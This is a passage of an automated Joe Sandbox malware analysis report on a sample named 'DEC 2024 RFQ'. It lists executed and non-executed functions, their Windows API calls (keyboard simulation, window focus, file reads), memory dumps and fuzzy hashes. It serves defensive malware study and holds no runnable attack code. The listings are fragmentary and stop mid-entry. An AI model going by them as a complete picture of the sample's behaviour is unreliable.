                                                                                                                      • Instruction ID: 4a522df79fa1ecf8e0d84d471f936389b1dcff423be8b09fc433eab4ae42b62e
                                                                                                                      • Opcode Fuzzy Hash: 139a02b14ff2e7fab814a8089fc268647f3710c82d82dac413c4997c38ef4525
                                                                                                                      • Instruction Fuzzy Hash: 532155B4608311DFCB64DF64D444B6ABBE1BF89314F04886CF98A57722CB31E805CB92
                                                                                                                      Function 00025BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,000256A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00025C16
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      • Opcode ID: 0f4ea8731ec7d55a40a3adc89a8b99bcd5c1db2ae12a68aa59578016cc6b8702
                                                                                                                      • Instruction ID: 5f2a2d587fc36a47451e6f90ff51b581c273f365a6e4a68d1587f5aedfc53ce3
                                                                                                                      • Opcode Fuzzy Hash: 0f4ea8731ec7d55a40a3adc89a8b99bcd5c1db2ae12a68aa59578016cc6b8702
                                                                                                                      • Instruction Fuzzy Hash: C7113A71200B159FD3318F19D880B66B7F4EF44761F20C92EE99A86A51D770E844CB64
                                                                                                                      Function 00025A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 9f3ded07322f352e8a10de6e5b29e511e5eed242f4c9ed39c3b1c7becfd31a48
                                                                                                                      • Instruction ID: 7df86f03a2b504a91ce8036380c46a2d5eaa745b79df785e344ce6d613cb9340
                                                                                                                      • Opcode Fuzzy Hash: 9f3ded07322f352e8a10de6e5b29e511e5eed242f4c9ed39c3b1c7becfd31a48
                                                                                                                      • Instruction Fuzzy Hash: 58017CB5600902AFC305EB29D841D6AF7A9FF8A311714856AE919C7703DB75EC21CBE4
                                                                                                                      Function 00044863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __lock_file.LIBCMT ref: 000448A6
                                                                                                                        • Part of subcall function 00048B28: __getptd_noexit.LIBCMT ref: 00048B28
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __getptd_noexit__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2597487223-0
                                                                                                                      • Opcode ID: 1edc67fab104a21a074c1101aaa8c69a8f7d754455c7e79c4b9d1ccafb7b231a
                                                                                                                      • Instruction ID: 3f1dc1bb6247a59740825b9c20b153bd99c88494617c77b8a5b97c076778bfae
                                                                                                                      • Opcode Fuzzy Hash: 1edc67fab104a21a074c1101aaa8c69a8f7d754455c7e79c4b9d1ccafb7b231a
                                                                                                                      • Instruction Fuzzy Hash: D7F0AFF1901609ABDF51AFA48C067EE36E0AF01325F158838B424AA193DF788951DB59
                                                                                                                      Function 00024E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(?,?,000E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00024E7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
                                                                                                                      • Opcode ID: efd72df07ca48e966c4ea77070aa8b39897b800e55c872b7bf76d6a5dfa14ef0
                                                                                                                      • Instruction ID: 4a6ce1dd97450434cc64e8676e5e9f3b997995f2c0023fc7408ff732d4f267b3
                                                                                                                      • Opcode Fuzzy Hash: efd72df07ca48e966c4ea77070aa8b39897b800e55c872b7bf76d6a5dfa14ef0
                                                                                                                      • Instruction Fuzzy Hash: 76F03071501721CFEF349F64E494816B7E5BF14329312893EE1D682611C7719840DF40
                                                                                                                      Function 00040791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000407B0
                                                                                                                        • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongNamePath_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2514874351-0
                                                                                                                      • Opcode ID: c201cd4324495a0e0881b7ff1e914e173d3fa9f0a76a563ca0fd5104b9049f20
                                                                                                                      • Instruction ID: 7c0aaca0ea4d2875f4967f571875e74b49bb356cdf0b6bd4b05f0b67738c5e15
                                                                                                                      • Opcode Fuzzy Hash: c201cd4324495a0e0881b7ff1e914e173d3fa9f0a76a563ca0fd5104b9049f20
                                                                                                                      • Instruction Fuzzy Hash: FDE0CD369051285BC721D6989C05FFA77DDDFC97A1F0441B6FC0CD7215DD649C8086D0
                                                                                                                      Function 00088E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2638373210-0
                                                                                                                      • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                      • Instruction ID: 33fbdc5ebd84e9de36e63d7c0267fcfac27067da529880024e52e8b15eb25611
                                                                                                                      • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                      • Instruction Fuzzy Hash: BFE092B0104B045BD7389A24D811BE373E1BB05315F00081DF2EA93242EB6278418759
                                                                                                                      Function 00025C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0005DD42,?,?,00000000), ref: 00025C5F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FilePointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 973152223-0
                                                                                                                      • Opcode ID: 9bbf94906ba4847260756282487f30e2f5f22cf22487ee7bd97b90c7b8ce1b57
                                                                                                                      • Instruction ID: 7d2585062367221c3fc5ca4078409e71d61c0e4737a16b4185925a4a58b1f58b
                                                                                                                      • Opcode Fuzzy Hash: 9bbf94906ba4847260756282487f30e2f5f22cf22487ee7bd97b90c7b8ce1b57
                                                                                                                      • Instruction Fuzzy Hash: D8D0C77464020CBFE710DB80DC46FA9777CD705710F100194FD0456290D6B27D508795
                                                                                                                      Function 0004525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wfsopen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 197181222-0
                                                                                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                      • Instruction ID: 19a0db27a6a43f4deddc9b53b8460c1b4a8db804ef5104f86bf18e98c36d5b4a
                                                                                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                      • Instruction Fuzzy Hash: B4B092B644020C77CE012A82EC02A893B199B46764F408021FB0C18163A6B3A6649A89
                                                                                                                      Function 0008D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 0008D1FF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: ba748da0061547d1474c9a324110bd55e8485accd55fc09295fb8931fe9b9287
                                                                                                                      • Instruction ID: 4c215e0bebbe351102914d9b238c8499ab8c5b401b9e0fefa3dad178e2df6837
                                                                                                                      • Opcode Fuzzy Hash: ba748da0061547d1474c9a324110bd55e8485accd55fc09295fb8931fe9b9287
                                                                                                                      • Instruction Fuzzy Hash: F77162306043119FCB14EF64D491AAEB7E4BF99314F044A6DF8969B3A2DB30E945CB52
                                                                                                                      Function 0173B48C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 0173B4A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                      • Instruction ID: 736bd48413a6e8a4a0b690607872f9d97bb239efda0e1d8edb04557b387b3269
                                                                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                      • Instruction Fuzzy Hash: BAE0BF7494010DEFDB00EFE4D5496DE7BB4EF04301F1045A5FD05D7681DB309E548A66
                                                                                                                      Function 0173B490 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 0173B4A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction ID: 9a75734652d576ce293167baf4a22c2165a849cd5c58e23dfbf2ce36d5ff828d
                                                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction Fuzzy Hash: 32E0E67494010DDFDB00EFF4D54969E7FB4EF04301F104165FD01D2281D7309D508A62

                                                                                                                      Non-executed Functions

                                                                                                                      Function 000ACABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 000ACB37
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000ACB95
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000ACBD6
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000ACC00
                                                                                                                      • SendMessageW.USER32 ref: 000ACC29
                                                                                                                      • _wcsncpy.LIBCMT ref: 000ACC95
                                                                                                                      • GetKeyState.USER32(00000011), ref: 000ACCB6
                                                                                                                      • GetKeyState.USER32(00000009), ref: 000ACCC3
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000ACCD9
                                                                                                                      • GetKeyState.USER32(00000010), ref: 000ACCE3
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000ACD0C
                                                                                                                      • SendMessageW.USER32 ref: 000ACD33
                                                                                                                      • SendMessageW.USER32(?,00001030,?,000AB348), ref: 000ACE37
                                                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 000ACE4D
                                                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 000ACE60
                                                                                                                      • SetCapture.USER32(?), ref: 000ACE69
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 000ACECE
                                                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 000ACEDB
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000ACEF5
                                                                                                                      • ReleaseCapture.USER32 ref: 000ACF00
                                                                                                                      • GetCursorPos.USER32(?), ref: 000ACF3A
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 000ACF47
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 000ACFA3
                                                                                                                      • SendMessageW.USER32 ref: 000ACFD1
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 000AD00E
                                                                                                                      • SendMessageW.USER32 ref: 000AD03D
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 000AD05E
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 000AD06D
                                                                                                                      • GetCursorPos.USER32(?), ref: 000AD08D
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 000AD09A
                                                                                                                      • GetParent.USER32(?), ref: 000AD0BA
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 000AD123
                                                                                                                      • SendMessageW.USER32 ref: 000AD154
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 000AD1B2
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 000AD1E2
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 000AD20C
                                                                                                                      • SendMessageW.USER32 ref: 000AD22F
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 000AD281
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 000AD2B5
                                                                                                                        • Part of subcall function 000225DB: GetWindowLongW.USER32(?,000000EB), ref: 000225EC
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000AD351
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                      • String ID: @GUI_DRAGID$F
                                                                                                                      • API String ID: 3977979337-4164748364
                                                                                                                      • Opcode ID: 732ccdee660e334b38ea8172987e54c17909a0a563711661f156c2604ad3ce81
                                                                                                                      • Instruction ID: 74040f461b902da44d03178abf0ee309948603106f488c0a00594d23d4f30c95
                                                                                                                      • Opcode Fuzzy Hash: 732ccdee660e334b38ea8172987e54c17909a0a563711661f156c2604ad3ce81
                                                                                                                      • Instruction Fuzzy Hash: AB42D034204741AFEB24CFA4CC84EAABBE5FF4A710F140919F6959B2B1C732D950DBA1
                                                                                                                      Function 00036F9E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$_memset
                                                                                                                      • String ID: ]$DEFINE$P\$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                                                      • API String ID: 1357608183-996749009
                                                                                                                      • Opcode ID: cc0e8de2158a51a486afd13419c603d26ff0e5c6da6c99ea160292857e035237
                                                                                                                      • Instruction ID: cfb86fb897d894e84de1fc423e0d417777d11ef3526564023eda529472ea3a3e
                                                                                                                      • Opcode Fuzzy Hash: cc0e8de2158a51a486afd13419c603d26ff0e5c6da6c99ea160292857e035237
                                                                                                                      • Instruction Fuzzy Hash: 3693AE71E04219DBDB25CF98C881BADB7F1FF48310F24C16AE949AB281E7749E81DB54
                                                                                                                      Function 000248D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(00000000,?), ref: 000248DF
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0005D665
                                                                                                                      • IsIconic.USER32(?), ref: 0005D66E
                                                                                                                      • ShowWindow.USER32(?,00000009), ref: 0005D67B
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0005D685
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0005D69B
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0005D6A2
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0005D6AE
                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0005D6BF
                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0005D6C7
                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 0005D6CF
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0005D6D2
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0005D6E7
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0005D6F2
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0005D6FC
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0005D701
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0005D70A
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0005D70F
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0005D719
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0005D71E
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0005D721
                                                                                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 0005D748
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                                      • Opcode ID: 25aa4fdefb898f604385e069440127af1d4ad51655535f11caaebc18609881db
                                                                                                                      • Instruction ID: ddd5faa74cb44a3ec6026352093ee898f6c9dd69dbf0dd1f69db9bd8e3b810a8
                                                                                                                      • Opcode Fuzzy Hash: 25aa4fdefb898f604385e069440127af1d4ad51655535f11caaebc18609881db
                                                                                                                      • Instruction Fuzzy Hash: A8319271A40718BBFB306FB19C49F7F3EACEB45B51F104026FA04EA1D1DAB45901ABA1
                                                                                                                      Function 00078310 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 224COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
